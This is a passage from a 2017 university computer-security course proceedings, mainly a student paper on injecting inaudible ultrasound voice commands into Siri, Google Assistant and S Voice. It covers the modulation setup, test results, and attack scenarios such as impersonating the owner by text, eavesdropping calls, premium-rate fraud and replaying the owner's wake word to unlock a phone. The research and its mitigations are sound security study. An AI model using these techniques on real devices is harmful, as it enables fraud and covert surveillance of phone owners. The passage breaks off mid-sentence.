You are on page 1of 104

NATIONAL UNIVERSITY OF SINGAPORE

SCHOOL OF COMPUTING

CS3235 - Semester I,
2017-2018

Computer Security

Final Versions of the Projects for CS3235


(Computer Security)
Singapore, November 2017.

intro 1
ii

intro 2
Table of Contents

Indiscernible Voice Command Injection on Voice-Controlled Systems:


Smartphones. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Lam Chi Thanh, Francis Cheng, Irvin Lim Wei Quan,
Kerr Xiang Jie and Ho Wei Lip (Gp 1)

Drone Hijacking. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Lim Shunyong, Ong Jing Yin,
Priit Rinken and Shee Zhi Xiang (Gp 2)

Exploration of Weakness in Bike Sharing System. . . . . . . . . . . . . . . . . . . . . . . . . . . 17


Tan Fengji, Tan Jian Sin, Tan Ngee Joel Jonas,
Tan Wee Chen William and Tang Di Feng (Gp 3)

Securing NFC Tags. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25


Chua Yu Peng, Lee Ying Jie,
Teng Yong Hao and Wang Weili Aloysius (Gp 4)

VideoCaptcha. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Ong Liwei, Lim Wei Jie, Marcus Ng Wen Jian,
Mooi Chung Yu Dexter and Low Bao Ling Vivian (Gp 5)

Smart Door Authentication System. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37


Tan Jia Shun, Tan Wang Leng, Tean Zheng Yang,
Teddy Hartanto and Yang Jung Kai (Gp 6)

Fingerprint Security System for Web Applications. . . . . . . . . . . . . . . . . . . . . . . . . . 45


Adeeb Ashraf Bin Mirzha Alam Arif, Ye Kyaw Swa Aung Joshua,
Chua Si Hao, Choy Wan Ying Amanda, and
Au-yong Xiang Rong Alwinson (Gp 7)

Home Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Guo Jiaqi, Kowshik Sundararajan, Low Yong Siang,
Muhammad Mustaqiim Bin Muhar and Mun Le Yuan (Gp 8)

Exploration of the Evil Twin Attack on Wifi Access Points


and Countermeasure. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Melvin Soh, Rajendran Premkumar, Tiago Kieliger,
Valérian Rey and Yoshiaki Nishimura (Gp 9)

iii

intro 3
Exploiting DNS Protocol as a Covert Channel. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Amarparkash Singh Mavi, Chua Lin Jing, Chu Ying Yu,
Hou Ruomu and Joelle Lim Yan Yi (Gp 10)

Hacking Bluetooth. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Lim Yong Zhi, Leon Overweel,
Leow Wei Siang and Lau Wen Hao (Gp 11)

Evaluation of the Security of Airline Booking Systems. . . . . . . . . . . . . . . . . . . . . . 93


Lu Yuehan, Matthieu Marie Emmanuel Buot De L’Epine,
Tan Xue Si, Tay Keming Justin and
Wong Kang Fei (Gp 12)

iv

intro 4
Indiscernible Voice Command Injection on Voice-
Controlled Systems in Smartphones

Lam Chi Thanh Francis Cheng Irvin Lim Wei Quan


School of Computing School of Computing School of Computing
National University of Singapore National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417 Singapore 117417
chithanh@u.nus.edu e0003811@u.nus.edu e0003697@u.nus.edu

Kerr Xiang Jie Ho Wei Lip


School of Computing School of Computing
National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417
a0124331@u.nus.edu a0121628@u.nus.edu

ABSTRACT (now superseded by Bixby) on Samsung devices. These VCSs


In this paper, we explore various voice-controlled systems (VCSs) allow smartphone owners to perform many daily tasks on the
on smartphones, such as Apple Siri and Google Assistant. We smartphone such as making calls, sending messages or performing
show that these VCSs are potentially open to unauthorised a web search. This method of interaction has become increasingly
activation and use by injecting indiscernible voice commands over popular due to its accessibility, which does not require the
the air, without the knowledge of the victim. These indiscernible owner’s physical interaction with the smartphone’s touchscreen,
voice commands are specially constructed ultrasound signals, by as well as its accuracy, in recognizing and interpreting the human
using amplitude modulation of a human voice baseband signal voice with a fairly small margin of error.
onto an ultrasound carrier. As VCSs are ubiquitous and come However, even though there have been recent advances in speech
built-in into most smartphones today, we explore the potential recognition (SR) enhancing the capabilities of VCSs in
vulnerabilities and compare security levels put in place by popular smartphones today, less is known about the potential
smartphone VCSs, and discuss potential attack scenarios that vulnerabilities that this additional user interface (UI) to the
could arise from specifically using indiscernible voice commands smartphone may possess. Many VCSs have a limited set of voice
as an attack vector. commands available on smartphones which are locked with a
passcode as a security feature, and other voice commands will not
Categories and Subject Descriptors be possible until the phone is unlocked.
K.6.5 [Management of Computing and Information Systems]:
Prior work by Diao et al. [4] has shown that attacks such as
Security and Protection.
privilege escalation are possible on VCSs (namely, Google Voice
General Terms Search on Android), and can even be performed without the
Design, Security, Human Factors, Experimentation, Verification owner’s knowledge through injection of inaudible voice
commands [17].
Keywords Many smartphone owners may be unaware of the presence of
Siri, Google Assistant, S Voice, smartphones, command injection, VCSs on their smartphones, or may have forgotten about it having
voice-controlled systems (VCSs), speech recognition (SR), voice it previously set up and configured. These smartphones may be
synthesis, security analysis, defence vulnerable to attack without the owner’s knowledge. This paper
thus has two aims: (a) How feasible is it to inject an indiscernible
1. INTRODUCTION voice command to smartphones? Without professional equipment
Most modern smartphone mobile operating systems today come ourselves, we explored the effectiveness performing such as
built-in with voice-controlled systems (VCSs) such as Siri and attack using only amateur audio equipment and software-defined
Google Assistant, allowing the user to perform actions on the radios (SDRs). Evaluating the feasibility of such an attack using
smartphone without any physical interaction, using only his or her limited resources allows us to effectively determine the possibility
voice to control it. With an estimated 62.9% of the world of such an attack being mounted by amateur, malicious agents
population owning a smartphone in 2016, and with this percentage with a limited budget. (b) To what extent can attacks on VCSs be
expected to grow from 2017 to 2019 [7], the smartphone is one of used to hijack smartphones? We evaluate the possibility of
the most ubiquitous devices in the world to be shipped with VCSs. various scenarios through the attack, including activating the said
VCSs are available on most smartphones on the market today, VCS on a passcode-locked smartphone, as well as the possibility
such as Google Assistant on Android, Siri on iOS, and S Voice

gp01
PDFsam_merge 1
5
of privilege escalation using VCSs, by unlocking a passcode- 2.1.2 Voice Command Recognition/Execution
locked smartphone using only voice commands. Once the VCS has been activated, the VCS would typically enter
Hence, this paper aims to further explore the feasibility of a state similar to a read-eval-print loop (REPL) found in some
mounting an indiscernible voice command injection attack on programming languages, most notably Lisp. That is, the VCS
three VCSs on smartphones, the extent of such attacks, as well as listens for voice commands, interprets and translates it into text
possible defences to mitigate them. using speech recognition, and then executes the command
accordingly, printing any output from the evaluation of the
2. VOICE-CONTROLLED SYSTEMS command on the screen, or in the case of VCSs, reading aloud the
2.1 Overview of VCSs in Smartphones VCS output via the smartphone’s speaker.
Using only the human voice, the user is able to perform tasks on Speech recognition (SR) enables software to recognise, interpret
smartphone without any physical interaction with the smartphone. and translate human voice into text. This is usually achieved by
For example, the user can simply call a person from his contact modelling the features of the input signal, as well as with respect
list with a voice command (e.g. “Call Tom”). to the target language to perform speech recognition in.
This process of controlling a smartphone using the human voice Techniques used in speech recognition traditionally used hidden
would require a VCS to bridge both the hardware aspects of Markov models (HMMs) [11], but newer deep learning
capturing and processing audio signals to recognise, capture and techniques such as long short-term memory (LSTM) recurrent
convert them into digital audio, as well as the software aspects of neural networks (RNNs) have also been recently used in Google’s
voice search capabilities [14].
translation into text using speech recognition and executing the
voice commands from there. Due to the high computational requirement of speech recognition
The typical workflow of smartphone VCSs is performed in two technology, especially for implementations that make use of deep
parts: the activation of the VCS, followed by executing of the learning algorithms, the task of speech recognition is usually
voice command. offloaded to a remote, powerful server. This means that VCSs can
function only when the smartphone has a connection to the
Smartphone VCSs can be activated either through physical Internet. The result is that VCSs may seem to take a few moments
interaction (e.g. long-press of the home button on an iPhone 6S), to “process” the user’s input, before returning the command or
or through voice activation using a wake command. We will only results that should be displayed or played back to the user.
be exploring voice activation in this paper, in order to explore the
possibility of performing a hands-free attack on smartphone 2.2 Analysis of Popular Smartphone VCSs
VCSs. The three most popular VCSs in smartphones today are Siri,
Google Assistant and S Voice, available on iOS, Android and
2.1.1 Voice Activation Samsung devices respectively. Each VCS has its own set of voice
The basis of voice activation is to allow a user to command his or commands, with some overlap in the set of voice commands
her smartphone to start listening for and executing voice between most smartphone VCSs.
commands on request. This is normally done through saying a
All VCSs explored are also not enabled on the smartphones by
wake command, such as “Hey Siri” on the iOS.
default, and require the owner to explicitly turn on the feature.
While speech recognition of voice commands is not performed in This will trigger a “training” process to register the owner’s voice
the background whilst the smartphone remains turned on, voice saying the wake command, before allowing the VCS to be used.
activation is typically available as an always-on feature. This
allows the user to activate the VCS at any time, even when the 2.2.1 Siri (iOS)
smartphone is in “sleep mode” (i.e. the screen is turned off). Siri is the VCS available on Apple’s iOS, the operating system for
its hardware, including iPhones and iPads, as well as other
Most smartphones come integrated with a separate, low-power operating systems developed by Apple, including macOS and
audio processor unit found on the smartphone’s integrated circuit tvOS. Siri has been included in iPhones from iOS 5 onwards.
(IC). For example, the Samsung Galaxy S7 uses the DBMD4
voice processor (part number D4A1A) solely for voice activation Siri can be activated either through a long-press of the iPhone’s
[6], which comes with a programmable software framework that home button, or through a wake command “Hey Siri”, if Allow
allows the operating system (OS) to communicate with it [5]. The Hey Siri is enabled in the Settings app. This will overlay the Siri
OS provides the VCS software access to this voice processor popup over the screen, which will then prompt the user for further
unit’s interface, in order to configure wake commands or other voice commands.
settings. The user must enable Siri through the Settings app, which will
In order to prevent misuse of the VCS, most smartphone VCSs prompt the user to say the following phrases in order to recognise
may also restrict the voice activation of the VCS to the owner of the owner’s voice:
the smartphone. The VCS may “train” itself by capturing and • “Hey Siri” (3 times)
saving the wake command as said by the target user, so as to • “Hey Siri, how’s the weather today?”
recognise and verify the identity of a user based on his voice used • “Hey Siri, it’s me.”
for voice activation.
Additionally, in order to activate Siri from the lock screen or
The saved voice model would then be used by the voice processor when the phone’s screen is off, the Access on Lock Screen setting
module to determine if the user is authorised to activate the VCS must be enabled. This will allow the user to activate Siri (opening
under certain circumstances. The conditions in which this the popup) without physical interaction with the phone’s
verification is enforced are variable; some VCSs may allow any touchscreen, even if the phone is secured with a passcode.
user to perform voice activation whilst the screen is on, while only
allowing the original user to perform voice activation whilst the
screen is off.

gp01
PDFsam_merge 2
6
Figure 1. Frequency domain plots of audio signals at various stages of the attack.

2.2.2 Google Assistant (Android) Roy et al. argued that, in theory, amplifiers should produce output
Google Assistant is the VCS available on most Android phones in signals linearly with respect to the input sound and gain [12].
the market. It was launched in May 2016, and superseded the However, acoustic amplifiers tend to exhibit nonlinearities with
functions of Google Now, the previous personal assistant on respect to gain at frequencies above 25 kHz.
Android phones launched in July 2012. Without going into the exact mathematical modelling of the
Google Assistant can be activated either by opening the Google signal, Roy et al. showed that at higher frequencies, an additional
app and tapping the microphone icon, or with a wake command “shadow” frequency may be generated after an input signal passes
“Ok Google”. This will overlay Google Assistant over the screen, through an amplifier, albeit at a lower level [12].
similar to that of Siri.
3.2 Exploiting Nonlinearity Effects
This wake command can be enabled through the Google app, By exploiting the nonlinearities that exist in actual hardware,
under Settings > Voice > ‘Ok Google’ Detection, and enabling Say including the amplifiers found in smartphones, we are able to
“Ok Google” any time. This will prompt the user to say “Ok design an attack to transmit audio signals which should be
Google” 3 times to train its voice model. indiscernible to the human ear, but yet will get recognised by
Additionally, in order to activate Google Assistant from the lock smartphones.
screen, the Trusted Voice setting must be enabled within the ‘Ok Zhang et al. showed that it is possible to make use of amplitude
Google’ Detection settings. This setting will unlock the phone if modulation (AM) to modulate the baseband (i.e. the target
the wake command matches the stored voice model, payload) on an ultrasound carrier (i.e. frequencies greater or equal
simultaneously activating Google Assistant to the foreground. to 20 kHz), which produces inaudible audio signals to the human
ear, but is recognised by the VCSs tested [17].
2.2.3 S Voice (Samsung Android)
S Voice is a VCS found exclusively on Samsung devices, and was As seen in Figure 1, by modulating an audible target audio signal
launched in May 2012. It is currently superseded by Bixby on on an ultrasound baseband, the resultant signal is beyond the
newer Samsung devices, such as the Samsung Galaxy S8, which upper limit of the human adult hearing range at 20 kHz. This
was launched in April 2017. signal can be transmitted via an ultrasound transducer (i.e.
speaker) to the victim’s smartphone. Nonlinearity effects
S Voice can be activated either by opening the S Voice app, or
exhibited by the amplifier embedded within the smartphone
with a wake command “Hi Galaxy”. It should be noted that out of
hardware cause “shadow frequencies” to “appear” below the 20
the other 2 VCSs, S Voice is a standalone app that does not make
kHz cut-off point. Once passed through the smartphone’s low-
use of the same overlay available to Google Assistant.
pass filter, these frequencies remain intact, which can be then
The user can enable S Voice by enabling the Voice wake up converted to digital signals and piped into software-defined
setting. This will prompt the user to say “Hi Galaxy” a few times speech recognition modules.
in order to train the voice model.
4. EXPERIMENTAL DESIGN
S Voice can be activated in the lock screen after enabling Voice
We performed an experiment to attempt the described attack using
wake up. However, if the smartphone is secured with a passcode,
only entry-level audio equipment on various smartphones, to
the Wake up in secured lock setting must also be enabled.
accomplish our two aims of this research. These two aims are to
3. ATTACK DESIGN evaluate the feasibility of such an attack, as well as to explore the
The basis of the attack is to design an audio signal that is different types of attacks through such an attack vector.
indiscernible to the human ear, but yet it can be captured and 4.1 Experimental Setup
recognised by VCSs.
The experimental setup involves the preparation of the modulated
3.1 Nonlinearity Effects signals through the use of software-defined radios (SDRs), the
Although audio hardware is designed to be linear with respect to audio equipment used to transmit and playback the sound, as well
input parameters, in reality they may exhibit nonlinearities. The as various smartphones with its VCS enabled and trained. A photo
audio hardware available on a smartphone may include a of the experimental setup can be seen in Figure 2.
microphone, (pre)-amplifier, low-pass filter (LPF) as well as an
audio-to-digital converter (ADC).

gp01
PDFsam_merge 3
7
4.1.1 Hardware Setup perform any actions on the VCS. The attacker is not able to have
The list of audio hardware that were used are as follows: physical interaction with the VCS, alter the settings of the VCS or
install any malicious software.
● Power amplifier: Topping TP20-MK2
● Audio interface (DAC): Onyx Blackjack However, the attacker is aware of the VCS being used based on
● Bookshelf speakers: Audio Image brand the smartphone’s characteristics. For example, if the smartphone
is an iPhone, the attacker can infer that the VCS most likely being
Various VCSs were also tested on the following smartphones: used is Siri.
● Google Assistant: Samsung Galaxy S7, Xiaomi Note 3 It is also assumed that the victim’s smartphone is locked (i.e. at
● iOS Siri: iPhone 5S, iPhone 6, iPhone 7 the time of attack, the phone is at the lock screen), although the
● Samsung S Voice: Samsung Galaxy S7 victim’s smartphone may or may not be secured with a passcode.
Since it was established that some voice commands require the
passcode to be entered (if secured), this factor must also be taken
4.1.2 Software Setup into account when assessing the effectiveness of the attack.
In order to execute the attack, an audio recording software was
Furthermore, it is also assumed that the attacker possesses the
used (e.g. Audacity) to record the voice commands and wake
necessary equipment such as those described above, in order to
commands using our voices. The audio was recorded using the in-
transmit the audio signals to the victim’s smartphone.
built microphone of a MacBook Pro.
Additionally, we used GNU Radio, a free software development 4.3 Audio Inputs
toolkit for radio and signal processing. This was used for We recorded various voice commands and wake commands using
modulating an input audio file onto a given carrier frequency, and our own voices for each of the three VCSs that were tested. These
sending the resultant signal to the audio hardware setup as voice recordings were then piped to the amplitude modulator
described above. The flow graph used in GNU Radio is shown in using GNU Radio, and played back using the audio setup.
Figure 3. The carrier frequency can be controlled in real-time during
playback in GNU Radio. We experimented with various carrier
frequencies centred around 20 kHz.
4.4 Methodology
To perform the attack, we first set up the various VCSs on the
target smartphones. We also recorded different wake commands
(e.g. “Hey Siri”, “Ok Google”) as well as voice commands (e.g.
“Call 12345678”, “Open WhatsApp”) using our own voices, and
subsequently modulated them using GNU Radio on an ultrasound
carrier. We tested different combinations for playback of these
signals to different VCSs, using the audio hardware setup as
described in subsection 4.1.1.
Firstly, in order to evaluate the feasibility of mounting such an
attack, we assessed the possibility of VCS activation using both
Figure 2. Experimental hardware setup for performing the the owner’s voice and a foreign voice.
attack.
In particular, we wanted to identify if using a foreign voice was
possible to activate the various VCSs, as well as whether it was
still possible after modulation, as it is more unlikely for the
attacker to be in possession of a recording with the owner saying
the wake command. Foreign voices can either be another person’s
voice (i.e. the voice of someone who did not train the VCS), or
one that is generated using text-to-speech (TTS) tools.
On top of trying out these commands to activate the various
VCSs, we also explored the feasibility of using foreign voices
within voice command speech recognition, once the VCS has
been activated.
Secondly, through some initial experimentation, we realised that
VCSs could be activated within the lock screen before the
smartphone was unlocked. We also found out that the set of voice
Figure 3. GNU Radio flow graph for amplitude modulation. commands that were available on VCSs when the smartphone was
locked was different from when the smartphone was unlocked.
In order to evaluate the attacks that are possible through the VCS
4.2 Threat Model as an attack vector, we explored what voice commands were
The attacker’s goal is to use indiscernible voice commands to allowed by the VCS depending on two different contexts:
activate the VCS without the victim’s knowledge. “locked” and “unlocked”. The “locked” context would refer to
scenarios where the smartphone is currently at the lock screen,
It is assumed that the attacker does not have direct access to the
protected with a passcode or some other mechanism, whilst the
victim’s smartphone, and is unable to interact with the owner to
“unlocked” context refers to scenarios where the smartphone is

gp01
PDFsam_merge 4
8
either within the home screen/within another application, or does different voice commands in both the “locked” and “unlocked”
not have any protection mechanisms such as passcodes in place. contexts.
We thus played back the modulated signals for both human voices Table 3. Speech recognition of modulated voice commands
and TTS-generated voices in these two different contexts, whilst once VCS is activated (in the “locked” context)
the VCS is already activated.
“Locked” Context
4.5 Experimental Results
Through our experiment, we were indeed able to play back the
Commands Siri Google S Voice
modulated voice signal through the hardware and software setup
Assistant
as described above, and the output was only slightly noticeable.
As we did not possess a sound level meter, we were unable to
measure the exact loudness of the resultant output signal. Make a phone call ✓ ✗ ✓
The following two tables show the experimental results of (“Call 9123-4567”)
performing both VCS activation and voice command speech
recognition. We explored using both owner’s voices and foreign Visit URL in browser ✗ ✗ ✗
voices for both scenarios. (“Open google.com”)

Table 1. Results of activation of various VCSs Perform web search ✗ ✗ ✗


(“Search for pizza”)
Siri Google S Voice
Assistant
Open application ✗ ✗ ✗
(“Open WhatsApp”)
Owner’s Voice ✓ ✓1 ✓
Send text message ✓ ✗ ✓
Foreign Voice ✓ ✗ ✓2 (“Message John”)

Modulated ✗ ✓1 ✓ Open email ✗ ✗ ✗


Owner’s Voice
(“Open emails”)

Modulated ✗ ✗ ✗
Foreign Voice Unlock phone ✗ ✓3 ✗

Table 2. Results of speech recognition of voice commands for Table 4. Speech recognition of modulated voice commands
various VCSs (once VCS is activated) once VCS is activated (in the “unlocked” context)

Siri Google S Voice “Unlocked” Context


Assistant
Commands Siri Google S Voice
Owner’s Voice ✓ ✓ ✓ Assistant

Foreign Voice ✓ ✓ ✓ Make a phone call ✓ ✓ ✓


(“Call 9123-4567”)
Modulated ✓ ✓ ✓
Owner’s Voice Visit URL in browser ✓ ✓ ✓
(“Open google.com”)
Modulated ✓ ✓ ✓
Foreign Voice Perform web search ✓ ✓ ✓
(“Search for pizza”)

The subsequent tables show the experimental results to


accomplish the second aim of the experiment, where we executed
3
The “Trusted Voice” setting must be enabled, and the
1 smartphone’s screen must be switched on. However, it is also
The smartphone must not be asleep (i.e. screen is switched on). possible to use S Voice on a Samsung Android smartphone to turn
2
The smartphone must be unlocked (i.e. within the home screen on the screen, followed by using Google Assistant to bypass any
or another application) for this to work. passcode lock mechanisms.

gp01
PDFsam_merge 5
9
to have unlimited access to all voice commands within Google
Open application ✓ ✓ ✓ Assistant.
(“Open WhatsApp”)
5. POSSIBLE ATTACKS
Send text message ✓ ✓ ✓ Since the ultrasound medium allows us to send voice commands
and wake commands covertly, we explore different attacks based
(“Message John”) on the level of “access” that an attacker has obtained.
This access level is directly correlated with whether the
Open email ✓ ✓ ✓ smartphone being attacked is secured with a passcode or not (i.e.
(“Open emails”) “locked” or “unlocked” contexts). Furthermore, if the attacker is
able to obtain a recording of the victim’s voice where he or she is
saying the wake command, this would expand the scope of the
types of attacks that are possible on the smartphone.
4.6 Discussion
It was mentioned that the modulated voice output signal was 5.1 Attacks in the “Locked” Context
slightly noticeable when played back through our hardware and The following sections explore possible attacks whilst the victim’s
software set up. Theoretically, since we are modulating the smartphone is locked with a passcode or some other lock
baseband signal on a carrier frequency at 20 kHz, which is outside mechanism via the OS.
of the adult human hearing range, we should in fact not be able to Since it was shown in Table 3 that Google Assistant explicitly
hear any sounds. requires the wake command with the owner’s voice to activate the
This could be because the audio hardware that was being used to VCS in the “locked” context, as well as the “Trusted Voice”
play back the modulated voice signals also exhibited setting enabled, we assume that Google Assistant is not vulnerable
nonlinearities. Therefore, the “shadow frequencies” at an audible whilst the smartphone is in the “locked” context.
frequency range had already existed within the playback system,
5.1.1 Spoofing/Impersonation
and were thus picked up by both the human ear and the VCSs,
VCSs Affected: Siri, S Voice
albeit at a low level.
In Table 3 above, we showed that it was possible to perform an
In the first part of the experiment where we explored using
indiscernible voice command injection to send messages within
different types of voices to activate various VCSs, we were
the “locked” context.
successful in utilising the modulated signal of the owner’s voice
to activate both Google Assistant and S Voice. However, we were One possible attack would be as follows: Suppose that Alice’s
unsuccessful in obtaining the same results for Siri using the same phone is being attacked, where the attacker injects a command
equipment. “Message Bob”, followed by “Please help me, I need $1000
urgently. Can you transfer it to my bank account 123-45678-9?”.
This discrepancy may have been due to various factors, such as
the quality of the equipment that was being used to playback the The attacker can impersonate Alice when communicating with her
signals to the smartphones, or different physical characteristics of contacts via text message (such as through SMS) without the
the embedded audio hardware inside of different smartphones. knowledge of Alice, possibly extracting critical data, information
or resources (in this case, it was money).
We also observed (non-empirically) that the Samsung Galaxy S7
tends to pick up the “shadow frequencies” the most often out of 5.1.2 Snooping/Interception
all the other phones tested. We managed to verify this by using VCSs Affected: Siri, S Voice
the in-built voice recorder application within the different
In Table 3 above, we showed that it was also possible to perform
smartphones tested to record the playback of the modulated voice
an indiscernible voice command injection to make calls to
signals, and indeed we managed to hear the original voice much
arbitrary numbers whilst in the “locked” context.
clearer in the Samsung Galaxy S7 as compared to the other
phones. One possible attack to snoop around the victim would be to inject
a voice command that makes a call to a number owned by the
Comparing Table 1 and Table 2, we found out that speech
attacker, such as “Call 9123 4567”.
recognition of voice commands was indeed less strict as compared
to speech recognition for VCS activation. There are various Without the victim’s knowledge, the attacker can eavesdrop on
measures in place to prevent a foreign voice from activating the the sounds around the victim, including his private conversations
VCS on both Google Assistant and S Voice, especially when the with others, as long as the call is still ongoing. The only trace that
phone is locked. This supports the idea that a separate speech this leaves behind is an entry in the call log, which might reveal
recognition system is used for voice commands versus activation. the attacker’s phone number.
Comparing Table 3 and Table 4, we found that the number of 5.1.3 Premium-Rate Phone Calls
commands available on a locked smartphone are indeed very VCSs Affected: Siri, S Voice
limited. All three VCSs similarly have various measures in place
Another rather niche type of attack would be to command
to prevent misuse of the VCS by unwanted parties. For example,
unsuspecting victim’s smartphones to make phone calls to
all three VCSs did not allow the user to view emails on the
premium-rate phone numbers, which could cost the victim up to
smartphone without first unlocking it.
£6.98 (USD $9.17) per minute in the United Kingdom (UK) [9],
However, Google Assistant provides a “Trusted Voice” feature, charged to his or her post-paid phone bill.
allowing owners to unlock their smartphone using their voice.
An attacker which owns a premium-rate number could potentially
This could essentially allow smartphones with this feature enabled
scam others out of their money without their knowledge through
such attacks.

gp01
PDFsam_merge 10
6
5.2 Attacks in the “Unlocked” Context An attacker could obtain an audio recording of the victim’s voice
There are many more attacks which can only be performed whilst when he is activating the VCS, and utilise the above techniques to
the victim’s smartphone is not secured with a passcode, or has covertly transmit the same audio recording through ultrasound
already been unlocked via different means. carriers, effectively bypassing the identity verification
mechanisms in the VCS.
In particular, Google Assistant’s “Trusted Voice” feature allows
the smartphone to be unlocked using the owner’s voice. We had This attack is especially devastating in Google Assistant with
shown that the modulated voice signal of the owner’s voice saying “Trusted Voice” enabled, since this would allow an attacker to
“Ok Google” was sufficient to unlock an Android phone from a bypass not just voice activation, but to also unlock the phone and
“locked” context. bypass the protection usually enforced by a passcode or
fingerprint.
5.2.1 Denial of Service (DoS)
VCSs Affected: Siri, Google Assistant, S Voice 5.3.2 Voice Synthesis
If the attacker is not able to obtain such a recording, another
There are multiple ways that a smartphone can be denied access possible way to bypass this restriction is to synthesise a voice
from legitimate parties, such as through turning the smartphone signal that says the wake command, using the same features as the
off, disabling incoming/outgoing calls and connections, or by owner’s voice.
utilising the compromised smartphone as an attack vector to
perform a DoS attack on another party. If attacker manages to obtain a sufficiently long recording of the
victim’s voice, the attacker can attempt to perform concatenative
For example, a command such as “Turn on airplane mode” could speech synthesis by first extracting out phonemes from a given
be used to disable the smartphone from communicating via audio signal, and recombining them to match the phonemes of the
cellular networks and/or wireless connections. This could be used desired text [3].
to prevent the victim from receiving push notifications from
remote servers without his/her knowledge whilst the attack is in The idea is to recombine the audio segments corresponding to the
progress, for example. phonemes into that of a wake command. For example, for the
wake command “Ok Google”, the IPA transcription would be
Another possible attack could be to launch a DoS attack on “oˈkeɪˈɡuːɡul”. We attempted to extract out segments of an audio
another smartphone using the victim’s smartphone, similar to how file that contained the relevant phonemes that could allow us to
compromised machines may be used in a botnet. If the attack can reconstruct a wake command for our purposes.
be carried out on a large scale, such that the modulated signals can
be broadcasted in a densely-populated area, this may cause many CMU Sphinx
VCSs in smartphones in the area to be activated, launching a We attempted to perform automatic concatenative speech
large-scale DDoS attack by commanding these VCSs to send a synthesis by first making use of a phonetic library PocketSphinx
text message to a single phone number to overload the target’s from the CMU Sphinx project, to convert an input audio signal
inbox, for example. into phonemes [2]. We were successful in identifying the
Lastly, another trivial type of DoS attack would be to drain phonemes (with some degree of accuracy) from a given input
resources from the victim’s smartphone. For example, repeated audio file. Figure 4 below shows some sample output from using
activation of the VCS without the victim’s knowledge may drain PocketSphinx’s command-line interface to transcribe an audio file
the battery of the smartphone quicker than normal. This can be of one of our voices saying “Ok Google”.
achieved in the “locked” context as well.
5.2.2 Drive-By Download
VCSs Affected: Siri, Google Assistant, S Voice
By making use of voice commands to visit a URL, it could be
possible to execute a drive-by download of malware on the
target’s smartphone. The malicious software, once installed on the
smartphone, could then be used by the attacker to remotely access
and control the smartphone for further exploitation.
5.3 Bypassing VCS Voice Activation
Since the success of VCS voice activation is dependent on the
identity of the user who says the wake command, the described
attacks may only work in specific scenarios, if the attacker is able
to activate the VCS in the first place.
The following attacks show possible ways to bypass this
restriction.
5.3.1 Replay Attacks Figure 4. Using PocketSphinx to convert an input audio file to
VCSs Affected: Siri, Google Assistant, S Voice phonemes (in ARPAbet format).
The use of a voice signal as an identity verification mechanism is The start and end times of the each of the identified phonemes
convenient, but is not without its faults. It is inherently prone to corresponding to the audio file are displayed in the output, which
replay attacks since the wake command remains identical across could allow us to write a script to extract out the relevant parts of
different activations of the VCS. the audio file respectively.

gp01
PDFsam_merge 11
7
However, we were unsuccessful in using a synthesised voice This means that an attacker who does not know the victim’s
audio file to activate the VCS, through both normal, audible custom wake command will also not be able to activate the VCS.
playback as well as through modulated playback. However, such an approach is only security through obscurity,
Voice Synthesis Services and anyone who previously had knowledge of the custom wake
command (such as being in the vicinity while the victim uses the
We also tried out Lyrebird, a cloud-based service (currently still wake command) will still be able to perform a replay attack.
in beta) that uses deep learning methods to similarly synthesise
voice, using uploaded file samples of the person’s voice [8]. Finally, some third-party mobile app vendors are also looking to
However, we discovered that the success rate of such an approach integrate their services into VCSs for greater convenience for
is extremely low, and also requires a large amount of speech users. For example, the Oversea-Chinese Banking Corporation
samples of the victim’s voice. (OCBC), a large financial institution within many markets in East
Asia, allows users to make fund transfers using voice commands
Adobe Voco is also another software that aims to achieves the in Siri, integrated through its mobile application [16]. Considering
same purpose, and is known as being the “Photoshop for the the high risk involved in exposing financial actions on the VCS,
voice”, purportedly allowing easy manipulation of the human users should also take caution before enabling such features on
voice within audio files [1]. It is still yet to be officially released, their smartphone as well.
and requires approximately 20 minutes of sample speech files of
the target user to be effective. 7. CONCLUSION
In this paper, we showed that it was indeed possible to inject
We believe that with the development of deep learning techniques
indiscernible voice commands into three of the most popular
such as generative adversarial networks (GANs), voice synthesis
smartphone VCSs (Google Assistant, Siri and S Voice), using
is an increasingly possible and realistic attack in the near future
only entry-level audio equipment. This allows an attacker to take
requiring significantly lesser samples. For example, WaveNet by
over control of the device through various means, possibly
Google Deepmind is a generative model which aims to synthesise
employing several types of attacks such as denial-of-service or
speech from text, mimicking the human voice much closer than
drive-by downloads.
existing text-to-speech (TTS) systems [17].
With the widespread use of VCSs around the world not only in
6. MITIGATIONS smartphones, but also in smart home devices such as Amazon
Current VCSs explored have shown to have some existing Echo (Alexa) and Google Home (Google Voice), this
security mechanisms in place. For example, if the smartphone is vulnerability may seem to be serious indeed.
locked with a passcode, all VCSs do not allow access to data that
is otherwise only accessible after entering the passcode. However, the success rates of such attacks are largely dependent
Furthermore, it was also shown that Google Assistant and S Voice on the surrounding background noise level, as well as whether the
restrict the VCS to be activated on the lock screen via voice victim’s phone is open to voice activation without his/her
activation only if it matches the stored voice model. knowledge in the first place.

However, all VCSs are still susceptible to replay attacks on voice Such attacks may be made more possible in the near future,
activation. This allows an attacker to replay a recorded signal of through the development of various voice synthesis tools and deep
the owner’s voice saying the wake command to the smartphone, learning techniques. It is best that greater awareness of such
which can then activate the VCS. vulnerabilities in VCSs are made known early, and users of VCSs
should employ the relevant security practices to prevent
To prevent any of such attacks, the best recommendation would unauthorised use of their smartphone through a combination of
be to disable voice activation on the VCS, which would help users passcodes, limiting voice activation, and/or customising their
ensure that attackers will not be successful in performing an attack VCS wake command, if possible.
since they are not able to activate the VCS. However, this may be
